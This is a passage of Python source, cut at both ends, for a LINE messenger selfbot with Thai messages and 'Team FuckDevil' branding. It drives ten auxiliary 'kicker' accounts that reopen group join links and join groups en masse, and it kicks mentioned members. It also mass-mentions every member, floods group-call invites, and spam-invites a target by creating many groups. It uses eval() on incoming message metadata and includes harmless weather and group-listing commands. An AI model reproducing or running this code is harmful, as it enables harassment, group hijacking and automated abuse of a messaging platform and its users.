cnt = 0
line.sendMessage(to,text[:-2])
cnt = 0
elif "kickejoinid " in msg.text.lower():
spl = re.split("kickejoinid ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
gid = spl[1]
x = line.getGroup(gid)
if Amid not in [i.mid for i in x.members]:
if x.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
else:
sirilist = [i.mid for i in x.members if any(word in i.displayName for word in ["Doctor.A","Eliza","Parry","Rakko","しりちゃん"]) or i.displayName.isdigit()]
if sirilist == []:
x.preventedJoinByTicket = False
line.updateGroup(x)
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
kicker.sendMessage(gid,"🤒โหมดคุ้มกันแอดมินทำงานแล้วลูกพี่🤒")
else:
line.inviteIntoGroup(gid,[Amid])
x.preventedJoinByTicket = True
line.updateGroup(x)
kicker.sendMessage(gid,"🤒โหมดคุ้มกันคนเตะแอดมินทำงานแล้วลูกพี่🤒")
else:
line.sendMessage(to,"kicker อยู่ในกลุ่มอยู่แล้ว")
elif cmd == "มา":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = line.getGroup(msg.to)
if x.preventedJoinByTicket:
x.preventedJoinByTicket = False
line.updateGroup(x)
Ticket = line.reissueGroupTicket(msg.to)
kicker.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker2.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker3.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker4.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker5.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker6.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker7.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker8.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker9.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kicker.getGroup(msg.to)
G = kicker2.getGroup(msg.to)
G = kicker3.getGroup(msg.to)
G = kicker4.getGroup(msg.to)
G = kicker5.getGroup(msg.to)
G = kicker6.getGroup(msg.to)
G = kicker7.getGroup(msg.to)
G = kicker8.getGroup(msg.to)
G = kicker9.getGroup(msg.to)
G = kicker10.getGroup(msg.to)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
kicker.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker2.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker3.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker4.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker5.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker6.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker7.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker8.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker9.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
kicker10.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
else:
kicker.sendMessage(to,"🤨ทีมกากๆแบบกือมาแล้วครับ🤫")
elif "kickerleave " in msg.text.lower():
spl = re.split("kickerleave ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
kicker.leaveGroup(spl[1])
kicker2.leaveGroup(spl[1])
kicker3.leaveGroup(spl[1])
kicker4.leaveGroup(spl[1])
kicker5.leaveGroup(spl[1])
kicker6.leaveGroup(spl[1])
kicker7.leaveGroup(spl[1])
kicker8.leaveGroup(spl[1])
kicker9.leaveGroup(spl[1])
kicker10.leaveGroup(spl[1])
except Exception as e:
line.sendMessage(to,str(e))
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = client.getCompactGroup(msg.to)
G.preventedJoinByTicket = False
client.updateGroup(G)
invsend = 0
Ticket = client.reissueGroupTicket(msg.to)
g1.acceptGroupInvitationByTicket(msg.to,Ticket)
g1.kickoutFromGroup(msg.to, [target])
X = client.getCompactGroup(msg.to)
X.preventedJoinByTicket = True
client.updateGroup(X)
except:
pass
#===========BOT UPDATE============#
elif msg.text.lower().startswith("กวน"):
if msg._from in admin:
data = msg.text[len("กวน"):].strip()
if data == "":
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "<":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count > mentargs:
break
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == ">":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
if mentargs >= 0:
strt = len(str(mentargs)) + 2
else:
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count < mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "=":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
akh = int(0)
cnt = 0
for md in nama:
if count != mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
strt = len(str(count)) + 2
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif cmd == 'ห้องใคร':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถดูข้อมูลกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
try:
ccreator = group.creator.mid
gcreator = group.creator.displayName
except:
ccreator = None
gcreator = 'Not found'
if not group.invitee:
pendings = 0
else:
pendings = len(group.invitee)
qr = 'Close' if group.preventedJoinByTicket else 'Open'
if group.preventedJoinByTicket:
ticket = 'Not found'
else:
ticket = 'https://line.me/R/ti/g/' + str(line.reissueGroupTicket(group.id))
created = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime(int(group.createdTime) / 1000))
path = 'http://dl.profile.line-cdn.net/' + group.pictureStatus
res = '╭───🍁 ตรวจสอบ ควยสร้างห้อง 🍁'
res += '\n├🙄 ไอดี : ' + group.id
res += '\n├🙄 ชื่อ : ' + group.name
res += '\n├🙄 ควยสร้าง : ' + gcreator
res += '\n├🙄 วันที่เวลา : ' + created
res += '\n├🙄 ควยทั้งหมด ในห้อง : ' + str(len(group.members))
res += '\n├🙄 ควยที่ค้าง เชิญ : ' + str(pendings)
res += '\n├🙄 QR Status : ' + qr
res += '\n├🙄 Ticket : ' + ticket
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendImageWithURL(to, path)
if ccreator:
line.sendContact(to, ccreator)
line.sendMessage(to, res)
elif cmd.startswith('กลุ่ม'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsJoined()
gnames = []
ress = []
res = '╭───🍁ตรวจสอบควยสร้างห้อง🍁'
res += '\n❂ List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n❂ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n❂ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n❂👊Nothing'
res += '\n❂👊 Usage:'
res += '\n❂🍁 {key}กลุ่ม'
res += '\n❂🍁 {key}กลุ่ม Leave <num/name/all>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
ress.append(res)
if cmd == 'กลุ่ม1':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('leave '):
texts = textt[6:].split(', ')
leaved = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถออกลุ่มได้\nไม่พบชื่อกลุ่มนี้')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
else:
line.sendMessage(to, 'Failed leave group number %i, เลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in leaved:
continue
kicker.leaveGroup(gid)
kicker2.leaveGroup(gid)
kicker3.leaveGroup(gid)
kicker4.leaveGroup(gid)
kicker5.leaveGroup(gid)
kicker6.leaveGroup(gid)
kicker7.leaveGroup(gid)
kicker8.leaveGroup(gid)
kicker9.leaveGroup(gid)
kicker10.leaveGroup(gid)
leaved.append(gid)
#time.sleep(0.8)
if to not in leaved:
line.sendMessage(to, 'ออกทุกกลุ่มเรียบร้อย ♪')
else:
line.sendMessage(to, 'ไม่สามารถออกกลุ่มชื่อ `%s`นี้ได้\nไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ห้องรัน'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsInvited()
gnames = []
ress = []
res = '╭───🌷 การเชิญ กลุ่ม 🌷'
res += '\n├🍁 List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├🍁 Usage : '
res += '\n│👊 {key}ห้องรัน'
res += '\n│👊 {key}ห้องรัน เข้า ❪ พิมพ์/ทั้งหมด ❫'
res += '\n│👊 {key}ห้องรัน ลบ ❪ พิมพ์/ทั้งหมด ❫'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
ress.append(res)
if cmd == 'ห้องรัน':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('เข้า '):
texts = textt[7:].split(', ')
accepted = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้ากลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ เนื่องจากมายเลข %i นี้มากว่าคำเชิญที่คุณมี' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
elif name.lower() == 'ทั้งหมด':
for gid in gids:
if gid in accepted:
continue
line.acceptGroupInvitation(gid)
accepted.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
elif texttl.startswith('ลบ '):
texts = textt[7:].split(', ')
rejected = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถคำเชิญเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้าร่วมกลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามายกเลิกค้างเชิญหมายเลข %iนี้ได้เนื่องจากเลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
elif name.lower() == 'ทั้งหมด':
for gid in gids:
if gid in rejected:
continue
line.rejectGroupInvitation(gid)
rejected.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกคำเชิญเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถยกเลิกคำเชิญเข้าร่วมกลุ่มชื่อ`%s`นี้ได้เนื่องจากไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd == 'สมาชิก':
if msg.toType == 1:
room = line.getRoom(to)
members = room.contacts
elif msg.toType == 2:
group = line.getGroup(to)
members = group.members
else:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nไม่มีสมาชิกในกลุ่ม')
res = '╭───🍁 ข้อมูลเพื่อน ฉัน 🍁'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'ค้างเชิญ':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
members = group.invitee
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nไม่พบค้างเชิญ')
res = '╭───🍁 ค้างเชิญ สมาชิก 🍁'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'เปิดลิ้ง':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, 'ได้ทำการเปิดลิ้งกลุ่มแล้วเจ้านาย')
elif "im " in msg.text.lower():
query = msg.text.replace("im ","")
r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
data=r.text
data=json.loads(r.text)
if data != []:
for food in data:
line.sendImageWithURL(msg.to, str(food["url"]))
elif msg.text.lower() == "/gift":
msg.contentType = 9
msg.contentMetadata={'PRDID': '','PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
elif "/gift " in msg.text.lower():
red = re.compile(re.escape('.gift '),re.IGNORECASE)
themeid = red.sub('',msg.text)
msg.contentType = 9
msg.contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
elif msg.text.lower() == "weather:chiangmai":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1153670))),1)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1153670))),1)
elif msg.text.lower() == "weather:ubonratchathani":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1605245))),2)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1605245))),2)
elif msg.text.lower() == "weather:bangkok":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609350))),3)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609350))),3)
elif msg.text.lower() == "weather:phetchabun":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607737))),4)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607737))),4)
elif msg.text.lower() == "weather:khon kaen":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609776))),5)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609776))),5)
elif msg.text.lower() == "weather:ayutthaya":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607532))),6)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607532))),6)
elif msg.text.lower() in ["weather"]:
if msg.toType != 0:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
else:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
#-----------------------------------------------------------
elif msg.text.lower().startswith(".recall"):
if msg.toType == 2:
reps = int(msg.text.split(" ")[1])
asup = [g1.adityasplittext(msg.text,'s').replace('{} '.format(reps),'')]*reps
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
nama = [key1]
g1.sendMessage(to,"กำลังดำเนินการ...")
babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"กำลังดำเนินการ...")
group = g1.getGroup(to);nama = [contact.mid for contact in group.members]; babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
elif cmd.startswith("spaminv "):
aa = cmd.replace("spaminv ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker.groups
try:
kicker.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker.createGroup(name, [target])
for i in grup:
group = kicker.getGroup(i)
if group.name == name:
kicker.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv2 "):
aa = cmd.replace("spaminv2 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker2.groups
try:
kicker2.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker2.createGroup(name, [target])
for i in grup:
group = kicker2.getGroup(i)
if group.name == name:
kicker2.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker2.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv3 "):
aa = cmd.replace("spaminv3 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker3.groups
try:
kicker3.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker3.createGroup(name, [target])
for i in grup:
group = kicker3.getGroup(i)
if group.name == name:
kicker3.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker3.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv4 "):
aa = cmd.replace("spaminv4 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker4.groups
try:
kicker4.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker4.createGroup(name, [target])
for i in grup:
group = kicker4.getGroup(i)
if group.name == name:
kicker4.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker4.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv5 "):
aa = cmd.replace("spaminv5 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker5.groups
try:
kicker5.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker5.createGroup(name, [target])
for i in grup:
group = kicker5.getGroup(i)
if group.name == name:
kicker5.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker5.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv6 "):
aa = cmd.replace("spaminv6 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker6.groups
try:
kicker6.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker6.createGroup(name, [target])
for i in grup:
group = kicker6.getGroup(i)
if group.name == name:
kicker6.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker6.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv7 "):
aa = cmd.replace("spaminv7 ","")
bb = aa.split("-")
